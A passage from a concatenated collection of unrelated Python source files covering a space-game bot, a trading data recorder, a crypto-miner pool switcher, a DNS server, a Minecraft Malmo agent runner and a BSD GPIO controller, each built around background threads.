Slows down if not slowing down would result in overdo_lasering.
"""
if x == tx:
return sign(vx)
s = sign(tx - x)
if s == -1:
x, vx, tx = -x, -vx, -tx
def can_stop(x, vx):
return x + vx * (vx - 1) // 2 <= tx
if can_stop(x + vx + 1, vx + 1):
return -s
elif can_stop(x + vx, vx):
return 0
else:
return s
assert move_towards(1, 0, 2) == -1
assert move_towards(1, 1, 2) == 0
assert move_towards(1, 3, 2) == 1
assert move_towards(1, 3, 7) == 0
assert move_towards(1, 3, 6) == 1
assert move_towards(1, 3, 20) == -1
class RotatingStrategy(object):
def __init__(self):
self.field1 = []
self.field2 = {}
def apply(self, state):
self.field1.append('blablabla')
self.field2['abc'] = 'def'
print('=====ROTATE====')
st = State.parse(state)
print(st)
ship = st.player_ships(st.me)[0]
mid = (st.field_size + st.planet_size) / 2
x, y = -ship.y, ship.x
n = max(abs(x), abs(y))
x, y = mid * x / n, mid * y / n
dx = move_towards(ship.x, ship.vx, x)
dy = move_towards(ship.y, ship.vy, y)
print('===============')
if (dx or dy) and ship.fuel:
return [ship.do_thrust(dx, dy)]
else:
return []
def player(id, key, strategy):
res = send2([2, key, [103652820, 192496425430]])
joinres = JoinResult.parse(res)
total = joinres.budget
fake_state = from_python(
[6, [0, 10, -1, id, 0, 2, [], [], 4, [], [256, 1, [total, 1, 64], [16, 128], []], [], []], 9, []])
print(f'Send 2 res: {res}, available: {total}')
initial_stats = strategy.pick_stats(res)
state = send2([3, key, initial_stats])
images = []
T = 0
while True:
T += 1
state = send2([4, key, strategy.apply(state)])
# images.append(drawState(fake_state, from_python(state))[1])
# intermediate gif saves
# if T % 10 == 0:
# images[0].save(f'player{id}.gif', save_all=True, append_images=images[1:])
if state[1] == 2:
print('done')
break
# images[0].save(f'player{id}.gif', save_all=True, append_images=images[1:])
# print(send2([122, 203, 410, 164, 444, 484, 202, 77, 251, 56, 456, 435, 28, 329, 257, 265, 501, 18, 190, 423, 384, 434, 266, 69, 34, 437, 203, 152, 160, 425, 245, 428, 99, 107, 192, 372, 346, 344, 169, 478, 393, 502, 201, 497, 313, 32, 281, 510, 436, 22, 237, 80, 325, 405, 184, 358, 57, 276, 359, 189, 284, 277, 198, 244]))
# strategy2 = SwarmerStrategy(printships=False)
strategy1 = OrbiterStrategy(do_laser=True, printships=True, duplicate=False)
strategy2 = OrbiterStrategy(do_laser=False, printships=True, duplicate=True)
p1 = Process(target=player, args=p1 + [strategy1])
p2 = Process(target=player, args=p2 + [strategy2])
p1.start()
p2.start()
p1.join()
p2.join()
|
engine.py
|
""""""
import sys
from threading import Thread
from queue import Queue, Empty
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.constant import Exchange
from vnpy.trader.object import (
SubscribeRequest,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import EVENT_TICK, EVENT_CONTRACT
from vnpy.trader.utility import load_json, save_json, BarGenerator
from vnpy.trader.database import database_manager
from vnpy.app.spread_trading.base import EVENT_SPREAD_DATA, SpreadData
APP_NAME = "DataRecorder"
EVENT_RECORDER_LOG = "eRecorderLog"
EVENT_RECORDER_UPDATE = "eRecorderUpdate"
EVENT_RECORDER_EXCEPTION = "eRecorderException"
class RecorderEngine(BaseEngine):
""""""
setting_filename = "data_recorder_setting.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super().__init__(main_engine, event_engine, APP_NAME)
self.queue = Queue()
self.thread = Thread(target=self.run)
self.active = False
self.tick_recordings = {}
self.bar_recordings = {}
self.bar_generators = {}
self.load_setting()
self.register_event()
self.start()
self.put_event()
def load_setting(self):
""""""
setting = load_json(self.setting_filename)
self.tick_recordings = setting.get("tick", {})
self.bar_recordings = setting.get("bar", {})
def save_setting(self):
""""""
setting = {
"tick": self.tick_recordings,
"bar": self.bar_recordings
}
save_json(self.setting_filename, setting)
def run(self):
""""""
while self.active:
try:
task = self.queue.get(timeout=1)
task_type, data = task
if task_type == "tick":
database_manager.save_tick_data([data])
elif task_type == "bar":
self.write_log("一分析k线已插入数据库")
database_manager.save_bar_data([data])
except Empty:
continue
except Exception:
self.active = False
info = sys.exc_info()
event = Event(EVENT_RECORDER_EXCEPTION, info)
self.event_engine.put(event)
def close(self):
""""""
self.active = False
if self.thread.isAlive():
self.thread.join()
def start(self):
""""""
self.active = True
self.thread.start()
def add_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.bar_recordings:
self.write_log(f"已在K线记录列表中:{vt_symbol}")
return
if Exchange.LOCAL.value not in vt_symbol:
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.bar_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
else:
self.tick_recordings[vt_symbol] = {}
self.save_setting()
self.put_event()
self.write_log(f"添加K线记录成功:{vt_symbol}")
def add_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol in self.tick_recordings:
self.write_log(f"已在Tick记录列表中:{vt_symbol}")
return
# For normal contract
if Exchange.LOCAL.value not in vt_symbol:
contract = self.main_engine.get_contract(vt_symbol)
if not contract:
self.write_log(f"找不到合约:{vt_symbol}")
return
self.tick_recordings[vt_symbol] = {
"symbol": contract.symbol,
"exchange": contract.exchange.value,
"gateway_name": contract.gateway_name
}
self.subscribe(contract)
# No need to subscribe for spread data
else:
self.tick_recordings[vt_symbol] = {}
self.save_setting()
self.put_event()
self.write_log(f"添加Tick记录成功:{vt_symbol}")
def remove_bar_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.bar_recordings:
self.write_log(f"不在K线记录列表中:{vt_symbol}")
return
self.bar_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除K线记录成功:{vt_symbol}")
def remove_tick_recording(self, vt_symbol: str):
""""""
if vt_symbol not in self.tick_recordings:
self.write_log(f"不在Tick记录列表中:{vt_symbol}")
return
self.tick_recordings.pop(vt_symbol)
self.save_setting()
self.put_event()
self.write_log(f"移除Tick记录成功:{vt_symbol}")
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
self.event_engine.register(
EVENT_SPREAD_DATA, self.process_spread_event)
def update_tick(self, tick: TickData):
""""""
if tick.vt_symbol in self.tick_recordings:
self.record_tick(tick)
if tick.vt_symbol in self.bar_recordings:
bg = self.get_bar_generator(tick.vt_symbol)
bg.update_tick(tick)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.update_tick(tick)
def process_contract_event(self, event: Event):
""""""
contract = event.data
vt_symbol = contract.vt_symbol
if (vt_symbol in self.tick_recordings or vt_symbol in self.bar_recordings):
self.subscribe(contract)
def process_spread_event(self, event: Event):
""""""
spread: SpreadData = event.data
tick = spread.to_tick()
# Filter not inited spread data
if tick.datetime:
self.update_tick(tick)
def write_log(self, msg: str):
""""""
event = Event(
EVENT_RECORDER_LOG,
msg
)
self.event_engine.put(event)
def put_event(self):
""""""
tick_symbols = list(self.tick_recordings.keys())
tick_symbols.sort()
bar_symbols = list(self.bar_recordings.keys())
bar_symbols.sort()
data = {
"tick": tick_symbols,
"bar": bar_symbols
}
event = Event(
EVENT_RECORDER_UPDATE,
data
)
self.event_engine.put(event)
def record_tick(self, tick: TickData):
""""""
task = ("tick", copy(tick))
self.queue.put(task)
def record_bar(self, bar: BarData):
""""""
task = ("bar", copy(bar))
self.queue.put(task)
def get_bar_generator(self, vt_symbol: str):
""""""
bg = self.bar_generators.get(vt_symbol, None)
if not bg:
bg = BarGenerator(self.record_bar)
self.bar_generators[vt_symbol] = bg
return bg
def subscribe(self, contract: ContractData):
""""""
req = SubscribeRequest(
symbol=contract.symbol,
exchange=contract.exchange
)
self.main_engine.subscribe(req, contract.gateway_name)
|
when_switch.py
|
'''
listens for pool switch command
'''
import datetime
from threading import Thread
from queue import Queue
from colorama import Fore
#from pika.exceptions import ChannelClosed
from helpers import antminerhelper
from helpers.queuehelper import QueueName
from domain.mining import MinerCommand, MinerAccessLevel
from domain.logging import MinerLog
from backend.fcmapp import Component
COMPONENTACTION = Component('action')
def enthread(target, args):
'''put a method on a queue to be run in background'''
thread_queue = Queue()
def wrapper():
thread_queue.put(target(*args))
thread = Thread(target=wrapper)
thread.start()
return thread_queue
def when_switch(channel, method, properties, body):
'''Handler for pool switching'''
try:
print("[{0}] Received switch command".format(COMPONENTACTION.app.now()))
minermsg = COMPONENTACTION.app.messagedecodeminercommand(body)
qswitch = enthread(target=doswitch, args=(minermsg.miner, minermsg.command, ))
qswitch.get()
COMPONENTACTION.app.bus.acknowledge(COMPONENTACTION.listeningqueue, method.delivery_tag)
except BaseException as ex:
COMPONENTACTION.app.bus.reject(COMPONENTACTION.listeningqueue, method.delivery_tag)
print(Fore.RED + 'Could not run switch command: ' + COMPONENTACTION.app.exceptionmessage(ex))
def doswitch(miner, command: MinerCommand):
'''switch miner pool'''
if command.command:
txtalert = "{0} {1}".format(miner.name, command.command)
print(Fore.YELLOW + txtalert)
#check if privileged mode, raise alert if not in privileged mode!
access = COMPONENTACTION.app.antminer.getaccesslevel(miner)
if access == MinerAccessLevel.Restricted:
miner.set_ftp_port(COMPONENTACTION.app.configuration.get('discover.sshport'))
access = COMPONENTACTION.app.antminer.setminertoprivileged(miner)
if access == MinerAccessLevel.Restricted:
raise Exception('Could not set miner {0} to priviledged'.format(miner.name))
antminerhelper.switch(miner, command.parameter)
COMPONENTACTION.app.alert(txtalert)
log = MinerLog()
log.createdate = datetime.datetime.utcnow()
log.minerid = miner.key()
log.minername = miner.name
log.action = txtalert
COMPONENTACTION.app.log_mineractivity(log)
COMPONENTACTION.app.send(QueueName.Q_MONITORMINER, COMPONENTACTION.app.messageencode(miner))
def main():
COMPONENTACTION.listeningqueue = COMPONENTACTION.app.subscribe(QueueName.Q_SWITCH, when_switch, no_acknowledge=False)
COMPONENTACTION.app.listen(COMPONENTACTION.listeningqueue)
if __name__ == "__main__":
main()
|
server.py
|
#!/usr/bin/env python
# Flirble DNS Server
# Main server
#
# Copyright 2016 Chris Luke
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os, logging
log = logging.getLogger(os.path.basename(__file__))
import sys, threading, time
import SocketServer
import FlirbleDNSServer as fdns
"""Default local bind address."""
ADDRESS = '::'
"""Default local bind port."""
PORT = 8053
"""
The DNS Server.
Initializes various things then spawns a thread each for the UDP and TCP
services.
"""
class Server(object):
"""The list of SocketServer instances to launch threads for."""
servers = None
"""
Initializes the DNS server.
Creates a Geo object with the path to the GeoIP database.
Creates a Request handler with the zones and servers files, and the
Geo reference.
Then creates TCP and UDP servers, which opens sockets and binds them
to the given address and port.
@param rdb FlirbleDNSServer.Data The database object to use.
@param address str The local address to bind to. Default is "::".
@param port int The local port number to vind to. Default is "8053".
@param zones str The zones table to fetch zone data from.
@param server str The servers table to fetch server data from.
@param geodb str The Maxmind GeoIP database that the Geo class should
load. Default is None.
"""
def __init__(self, rdb, address=ADDRESS, port=PORT, zones=None,
servers=None, geodb=None):
super(Server, self).__init__()
log.debug("Initializing Geo module.")
geo = fdns.Geo(geodb=geodb)
log.debug("Initializing Request module.")
request = fdns.Request(rdb=rdb, zones=zones, servers=servers, geo=geo)
self.servers = []
log.debug("Initializing UDP server for '%s' port %d." %
(address, port))
self.servers.append(fdns.UDPServer((address, port),
fdns.UDPRequestHandler, request))
log.debug("Initializing TCP server for '%s' port %d." %
(address, port))
self.servers.append(fdns.TCPServer((address, port),
fdns.TCPRequestHandler, request))
self.request = request
self.geo = geo
self.rdb = rdb
"""
Starts the threads and runs the servers. Returns once all services have
been stopped, either by Exception or ^C.
"""
def run(self):
log.debug("Starting TCP and UDP servers.")
# Start the threads.
for s in self.servers:
thread = threading.Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
log.debug("DNS server started.")
try:
while True:
# This is the idle loop.
time.sleep(30)
self.request.idle()
except KeyboardInterrupt:
pass
finally:
log.debug("Shutting down DNS server.")
for s in self.servers:
s.shutdown()
self.rdb.stop()
self.request = None
self.geo = None
self.servers = None
self.rdb = None
|
event_source.py
|
# -*- coding: utf-8 -*-
#
# Copyright 2017 Ricequant, Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import time
from threading import Thread
from six.moves.queue import Queue, Empty
from rqalpha.interface import AbstractEventSource
from rqalpha.environment import Environment
from rqalpha.utils.logger import system_log
from rqalpha.events import Event, EVENT
from rqalpha.utils import rq_json
from .utils import get_realtime_quotes, order_book_id_2_tushare_code, is_holiday_today, is_tradetime_now
from . import data_board
class RealtimeEventSource(AbstractEventSource):
MARKET_DATA_EVENT = "RealtimeEventSource.MARKET_DATA_EVENT"
def __init__(self, fps):
self._env = Environment.get_instance()
self.fps = fps
self.event_queue = Queue()
self.before_trading_fire_date = datetime.date(2000, 1, 1)
self.after_trading_fire_date = datetime.date(2000, 1, 1)
self.settlement_fire_date = datetime.date(2000, 1, 1)
self.quotation_engine_thread = Thread(target=self.quotation_worker)
self.quotation_engine_thread.daemon = True
self.clock_engine_thread = Thread(target=self.clock_worker)
self.clock_engine_thread.daemon = True
def set_state(self, state):
persist_dict = rq_json.convert_json_to_dict(state.decode('utf-8'))
self.before_trading_fire_date = persist_dict['before_trading_fire_date']
self.after_trading_fire_date = persist_dict['after_trading_fire_date']
self.settlement_fire_date = persist_dict['settlement_fire_date']
def get_state(self):
return rq_json.convert_dict_to_json({
"before_trading_fire_date": self.before_trading_fire_date,
"after_trading_fire_date": self.after_trading_fire_date,
"settlement_fire_date": self.settlement_fire_date,
}).encode('utf-8')
def quotation_worker(self):
while True:
if not is_holiday_today() and is_tradetime_now():
order_book_id_list = sorted([instruments.order_book_id for instruments in self._env.data_proxy.all_instruments("CS", self._env.trading_dt)])
code_list = [order_book_id_2_tushare_code(code) for code in order_book_id_list]
try:
data_board.realtime_quotes_df = get_realtime_quotes(code_list)
except Exception as e:
system_log.exception("get_realtime_quotes fail")
continue
time.sleep(1)
def clock_worker(self):
while True:
# wait for the first data ready
if not data_board.realtime_quotes_df.empty:
break
time.sleep(0.1)
while True:
time.sleep(self.fps)
if is_holiday_today():
time.sleep(60)
continue
dt = datetime.datetime.now()
if dt.strftime("%H:%M:%S") >= "08:30:00" and dt.date() > self.before_trading_fire_date:
self.event_queue.put((dt, EVENT.BEFORE_TRADING))
self.before_trading_fire_date = dt.date()
elif dt.strftime("%H:%M:%S") >= "15:10:00" and dt.date() > self.after_trading_fire_date:
self.event_queue.put((dt, EVENT.AFTER_TRADING))
self.after_trading_fire_date = dt.date()
elif dt.strftime("%H:%M:%S") >= "15:10:00" and dt.date() > self.settlement_fire_date:
self.event_queue.put((dt, EVENT.SETTLEMENT))
self.settlement_fire_date = dt.date()
if is_tradetime_now():
self.event_queue.put((dt, EVENT.BAR))
def events(self, start_date, end_date, frequency):
running = True
self.clock_engine_thread.start()
self.quotation_engine_thread.start()
while running:
real_dt = datetime.datetime.now()
while True:
try:
dt, event_type = self.event_queue.get(timeout=1)
break
except Empty:
continue
system_log.debug("real_dt {}, dt {}, event {}", real_dt, dt, event_type)
yield Event(event_type, calendar_dt=real_dt, trading_dt=dt)
|
ucprocess.py
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Ralph Vigne, <ralph.vigne@cern.ch>, 2013
import fcntl
import json
import os
import resource
import signal
import sys
import threading
import time
import traceback
from pystatsd import Client
class UCProcess(object):
def get_open_fds(self):
fds = []
soft, hard = resource.getrlimit(resource.RLIMIT_NOFILE)
for fd in range(0, soft):
try:
fcntl.fcntl(fd, fcntl.F_GETFD)
except IOError:
continue
fds.append(fd)
return len(fds)
def __init__(self, cfg, mod_list, stop_event):
self.pid = os.getpid()
self.cfg = cfg
self.mod_list = mod_list
self.stop_event = stop_event
self.uc_threads = dict()
self.update = cfg['global']['update_interval']
self.received_stop = False
# Instanciating logging
self.cs = None
if 'carbon' in self.cfg['global']:
try:
self.cs = Client(host=self.cfg['global']['carbon']['CARBON_SERVER'], port=self.cfg['global']['carbon']['CARBON_PORT'], prefix=self.cfg['global']['carbon']['USER_SCOPE'])
except Exception, e:
print '!! Unable to connect to Carbon-Server !!'
print e
print traceback.format_exc()
# Preparing all UCs
self.uc_array = dict()
for module_name in self.mod_list:
try:
print '= (PID: %s) Instanciating module \'%s\' ... ' % (self.pid, module_name)
obj = __import__('rucio.tests.emulation.usecases.%s' % module_name) # Not sure why this is needed, but couldn't find an other working way
for mn in ['tests', 'emulation', 'usecases', module_name, 'UseCaseDefinition']:
obj = getattr(obj, mn)
# Applying multiplier to Hz rates
print '= (PID: %s) Importing sucessful. Exexcuting setup ...' % self.pid
for uc in self.cfg[module_name]:
if uc == 'context':
continue
self.cfg[module_name][uc] *= self.cfg['global']['multiplier']
obj = obj(self.cfg[module_name], self.cs) # Instanciate UC object
print '= (PID: %s) Initialized frequencies: %s' % (self.pid, obj.get_intervals())
self.uc_array[module_name] = obj
except Exception, e:
print '!! Error importing module \'%s\' !!' % module_name
print traceback.format_exc()
def run(self):
def signal_handler(signal, frame):
print '= (PID: %s) [%s] received SIGTERM' % (self.pid, time.strftime('%H:%M:%S', time.localtime()))
self.received_stop = True
try:
signal.signal(signal.SIGTERM, signal_handler)
except ValueError:
pass # Happens when using threads instead of sub processes
# Starting all defined use cases
self.pid = os.getpid()
try:
for uc in self.uc_array.items():
run = getattr(uc[1], 'run')
t = threading.Thread(target=run, args=[self.cfg['global'], self.stop_event])
t.deamon = True
t.start()
self.uc_threads[uc] = t
print '= (PID: %s) Starting up thread for %s ... OK' % (self.pid, uc[0])
except Exception, e:
print e
print traceback.format_exc()
try:
while not self.stop_event.is_set():
ta = threading.active_count()
of = self.get_open_fds()
if len(self.mod_list):
self.cs.gauge('emulator.counts.threads.%s' % self.mod_list[0], ta)
self.cs.gauge('emulator.counts.files.%s' % self.mod_list[0], of)
print '= (PID: %s) File count: %s' % (self.pid, self.get_open_fds())
print '= (PID: %s) Thread count: %s' % (self.pid, threading.active_count())
self.stop_event.wait(self.update)
try:
with open('/opt/rucio/etc/emulation.cfg') as f:
cfg = json.load(f)
for mod in cfg['global']['modules']:
with open('/opt/rucio/etc/%s.cfg' % mod) as f:
mcfg = json.load(f)
cfg.update(mcfg)
except Exception, e:
print 'Unable to check configuration for updates. Retry in %s seconds ...' % self.update
print e
continue
for mod in self.mod_list:
print '= (PID: %s) Checking context of %s for updates ...' % (self.pid, mod)
# Check frequencies
ups = {}
for uc in self.cfg[mod]:
if uc != 'context':
cfg[mod][uc] *= cfg['global']['multiplier']
if self.cfg[mod][uc] != cfg[mod][uc]:
ups[uc] = cfg[mod][uc]
self.cfg[mod][uc] = cfg[mod][uc]
if len(ups.keys()):
self.uc_array[mod].update_ucs(ups)
# Check context variables
try:
self.diff_context(self.cfg[mod]['context'], cfg[mod]['context'], ['context'], self.uc_array[mod])
except Exception, e:
print '!! ERROR !! Error while updaeting context: %s' % e
# Updated local cfg
self.cfg[mod]['context'] = cfg[mod]['context']
self.update = cfg['global']['update_interval']
# Reporting cfg - setting to graphite
for mod in cfg:
if mod == 'global':
self.cs.gauge('emulator.cfg.multiplier', cfg['global']['multiplier'])
self.cs.gauge('emulator.cfg.update_interval', cfg['global']['update_interval'])
else:
for frequ in cfg[mod]:
if frequ == 'context':
self.report_context(cfg[mod]['context'], 'emulator.cfg.%s.context' % mod)
else:
self.cs.gauge('emulator.cfg.%s.frequency.%s' % (mod, frequ), cfg[mod][frequ])
self.stop()
except Exception, e:
print e
print traceback.format_exc()
except KeyboardInterrupt:
pass
def stop(self):
print '= (PID: %s) Stopping threads ....' % self.pid
for mod in self.uc_threads.items():
print '= (PID: %s) Stopping module %s' % (self.pid, mod[0])
mod[1].join()
if self.received_stop:
print '= (PID: %s) Stopped successfully (Return Code: 0)' % self.pid
sys.exit(0)
else:
print '= (PID: %s) Stopped successfully (Return Code: 1)' % self.pid
sys.exit(1)
def diff_context(self, current, new, key_chain, uc):
nk = new.keys()
for key in current: # Check if keys are changed
if key in nk:
if type(current[key]) == dict:
self.diff_context(current[key], new[key], key_chain + [key], uc)
else:
if current[key] != new[key]:
print key_chain, current[key], new[key]
uc.update_ctx((key_chain + [key])[1:], new[key])
def report_context(self, ctx, prefix):
for key in ctx:
if type(ctx[key]) == dict:
self.report_context(ctx[key], '%s.%s' % (prefix, key))
elif type(ctx[key]) == unicode:
if ctx[key] == 'True':
self.cs.gauge('%s.%s' % (prefix, key), 1)
elif ctx[key] == 'False':
self.cs.gauge('%s.%s' % (prefix, key), 0)
elif isinstance(ctx[key], (int, long, float)):
self.cs.gauge('%s.%s' % (prefix, key), ctx[key])
else:
# print '%s\tCannot report\t%s.%s\t(type:\t%s)\t%s' % (now, prefix, key, type(ctx[key]), ctx[key])
pass
|
game.py
|
import MalmoPython
import os
import random
import threading
import time
import malmoutils
import pyson.runtime
from jason_malmo.actions import actions
from jason_malmo.agent import Agent
from jason_malmo.exceptions import NoAgentsException
from jason_malmo.tasks import TaskManager
class Game:
"""Game main class.
This class may be instantiated to run a Malmo Mission using Jason Agents.
Attributes:
name (str): Match's name.
world (str): World's generator string. `Flat world generator`_.
tasks (:obj:`jason_malmo.tasks.TaskManager`): Tasks Manager.
.. _Flat world generator:
http://minecraft.tools/en/flat.php
"""
def __init__(self, name):
self.name = name
self.world = '3;7,220*1,5*3,2;3;,biome_1'
self.tasks = TaskManager()
self._my_mission = None
self._client_pool = None
self._agents = []
self._jason_env = pyson.runtime.Environment()
def register(self, agent_file):
"""Register an Agent to the game.
Args:
agent_file (str): Path to the .asl file (Jason text file).
"""
with open(agent_file) as source:
agent = self._jason_env.build_agent(source, actions)
agent.__class__ = Agent
agent.malmo_agent = MalmoPython.AgentHost()
self._agents.append(agent)
def _get_mission_xml(self):
return '''<?xml version="1.0" encoding="UTF-8" ?>
<Mission xmlns="http://ProjectMalmo.microsoft.com" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<About>
<Summary>''' + self.name + '''</Summary>
</About>
<ModSettings>
<MsPerTick>50</MsPerTick>
</ModSettings>
<ServerSection>
<ServerInitialConditions>
<AllowSpawning>false</AllowSpawning>
</ServerInitialConditions>
<ServerHandlers>
<FlatWorldGenerator generatorString="''' + self.world + '''" />
<ServerQuitWhenAnyAgentFinishes />
</ServerHandlers>
</ServerSection>
''' + self._get_agents_xml() + '''
</Mission>'''
def _get_agents_xml(self):
xml = ''
for agent in self._agents:
xml += '''<AgentSection mode="Survival">
<Name>''' + str(agent.name) + '''</Name>
<AgentStart>
<Placement x="''' + str(random.randint(0, 10)) + '''" y="229" z="''' + str(random.randint(0, 10)) + '''"/>
</AgentStart>
<AgentHandlers>
<ContinuousMovementCommands turnSpeedDegs="360">
<ModifierList type="deny-list"> <!-- Example deny-list: prevent agent from strafing -->
<command>strafe</command>
</ModifierList>
</ContinuousMovementCommands>
<ObservationFromNearbyEntities>
<Range name="entities" xrange="40" yrange="2" zrange="40"/>
</ObservationFromNearbyEntities>
<ObservationFromRay/>
<ObservationFromFullStats/>
<ObservationFromGrid>
<Grid name="floor3x3">
<min x="-1" y="-1" z="-1"/>
<max x="1" y="-1" z="1"/>
</Grid>
</ObservationFromGrid>
</AgentHandlers>
</AgentSection>'''
return xml
def run(self):
"""Runs the game with the registered agents
Raises:
:class:`jason_malmo.exceptions.NoAgentsException`: There are not registered agents in the game.\n
Register an agent before running the game::
game.register('/path/to/file.asl')
game.run()
"""
self._client_pool = MalmoPython.ClientPool()
if not len(self._agents):
raise NoAgentsException
for port in range(10000, 10000 + len(self._agents) + 1):
self._client_pool.add(MalmoPython.ClientInfo('127.0.0.1', port))
self._my_mission = MalmoPython.MissionSpec(self._get_mission_xml(), True)
for (index, agent) in enumerate(self._agents):
malmoutils.parse_command_line(agent.malmo_agent)
self._safe_start_mission(
agent.malmo_agent,
self._my_mission,
self._client_pool,
malmoutils.get_default_recording_object(agent.malmo_agent, "saved_data"),
index,
''
)
self._safe_wait_for_start([agent.malmo_agent for agent in self._agents])
threads = []
for agent in self._agents:
thr = threading.Thread(target=self._jason_env.run_agent, args=(agent,), kwargs={})
thr.start()
threads.append(thr)
# TODO while mission is running
while True:
for agent in self._agents:
for (belief, value) in agent.beliefs.items():
if belief[0] == 'tasks':
tasks = []
for task in list(value)[0].args[0]:
tasks.append(task)
self.tasks.handle(agent, tasks)
time.sleep(0.05)
@staticmethod
def _safe_start_mission(agent_host, mission, client_pool, recording, role, experiment_id):
used_attempts = 0
max_attempts = 5
print("Calling startMission for role", role)
while True:
try:
agent_host.startMission(mission, client_pool, recording, role, experiment_id)
break
except MalmoPython.MissionException as e:
error_code = e.details.errorCode
if error_code == MalmoPython.MissionErrorCode.MISSION_SERVER_WARMING_UP:
print("Server not quite ready yet - waiting...")
time.sleep(2)
elif error_code == MalmoPython.MissionErrorCode.MISSION_INSUFFICIENT_CLIENTS_AVAILABLE:
print("Not enough available Minecraft instances running.")
used_attempts += 1
if used_attempts < max_attempts:
print("Will wait in case they are starting up.", max_attempts - used_attempts, "attempts left.")
time.sleep(2)
elif error_code == MalmoPython.MissionErrorCode.MISSION_SERVER_NOT_FOUND:
print("Server not found - has the mission with role 0 been started yet?")
used_attempts += 1
if used_attempts < max_attempts:
print("Will wait and retry.", max_attempts - used_attempts, "attempts left.")
time.sleep(2)
else:
print("Other error:", e.message)
print("Waiting will not help here - bailing immediately.")
exit(1)
if used_attempts == max_attempts:
print("All chances used up - bailing now.")
exit(1)
print("startMission called okay.")
@staticmethod
def _safe_wait_for_start(agent_hosts):
print("Waiting for the mission to start", end=' ')
start_flags = [False for _ in agent_hosts]
start_time = time.time()
time_out = 120 # Allow two minutes for mission to start.
while not all(start_flags) and time.time() - start_time < time_out:
states = [a.peekWorldState() for a in agent_hosts]
start_flags = [w.has_mission_begun for w in states]
errors = [e for w in states for e in w.errors]
if len(errors) > 0:
print("Errors waiting for mission start:")
for e in errors:
print(e.text)
print("Bailing now.")
exit(1)
time.sleep(0.1)
print(".", end=' ')
print()
if time.time() - start_time >= time_out:
print("Timed out waiting for mission to begin. Bailing.")
exit(1)
print("Mission has started.")
|
123.py
|
import threading
import os
from random import random
from pathlib import Path
def threadingz():
while True:
tempz = open("temp.txt","w+")
fuel = open("fuel.txt","w+")
speed = open("speed.txt","w+")
tempz.write("13")
fuel.write("152")
speed.write("200")
print(f"write done ")
targ = threading.Thread(target=threadingz)
targ2 = threading.Thread(target = targ)
targ3 = threading.Thread(target=targ2)
targ4 = threading.Thread(target = targ3)
targ.start()
targ2.start()
targ3.start()
targ4.start()
|
unix.py
|
#!/usr/bin/env python3
"""Module for BSD-specific features, which are not available on other operating
systems."""
__author__ = 'Philipp Engel'
__copyright__ = 'Copyright (c) 2019, Hochschule Neubrandenburg'
__license__ = 'BSD-2-Clause'
import queue
import shlex
import subprocess
import time
import threading
from enum import Enum
from typing import Any, Dict, Tuple, Union
from core.manager import Manager
from core.system import System
from core.prototype import Prototype
class Unix(Enum):
"""
Type of BSD Unix derivate, either None, FreeBSD, NetBSD, or OpenBSD.
"""
NONE = 0
FREEBSD = 1
NETBSD = 2
OPENBSD = 3
class GpioController(Prototype):
"""
GpioController sets single pins of the General Purpose Input Output
(GPIO) interface of a Raspberry Pi single-board computer running FreeBSD,
NetBSD, or OpenBSD. This module does not work on Linux.
The JSON-based configuration for this module:
Parameters:
defaultState (int): Default state of pin (either 0 or 1).
duration (float): Time span to change the state of the pin (in seconds).
pin (str): Name of the GPIO pin.
"""
def __init__(self, module_name: str, module_type: str, manager: Manager):
super().__init__(module_name, module_type, manager)
config = self.get_module_config(self._name)
self._default_state = config.get('defaultState')
self._duration = config.get('duration')
self._pin = config.get('pin')
self._os = {
'FreeBSD': Unix.FREEBSD,
'NetBSD': Unix.NETBSD,
'OpenBSD': Unix.OPENBSD
}.get(System.get_os_name(), Unix.NONE)
if self._os == Unix.NONE:
raise ValueError('Operating system is not supported')
self._queue = queue.Queue(-1)
self._thread = None
self.add_handler('gpio', self.handle_gpio)
manager.schema.add_schema('gpio', 'gpio.json')
def _communicate(self, cmd: str) -> Tuple[str, str]:
"""Communicates with the operating system using `subprocess`.
Args:
cmd: The command to execute.
Returns:
The stdout and stderr of the process.
"""
args = shlex.split(cmd)
process = subprocess.Popen(args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
return stdout.decode('utf-8'), stderr.decode('utf-8')
def _get_command(self, os: Unix) -> Union[str, None]:
"""Returns derivate-specific command to set a single pin of the GPIO
interface.
Args:
os: The BSD unix derivate.
Returns:
Command to access the GPIO interface on BSD.
"""
cmd = {
Unix.FREEBSD: 'gpioctl -f /dev/gpioc0 {} {}',
Unix.NETBSD: 'gpioctl gpio0 {} {}',
Unix.OPENBSD: 'gpioctl gpio0 {} {}'
}.get(os, None)
return cmd
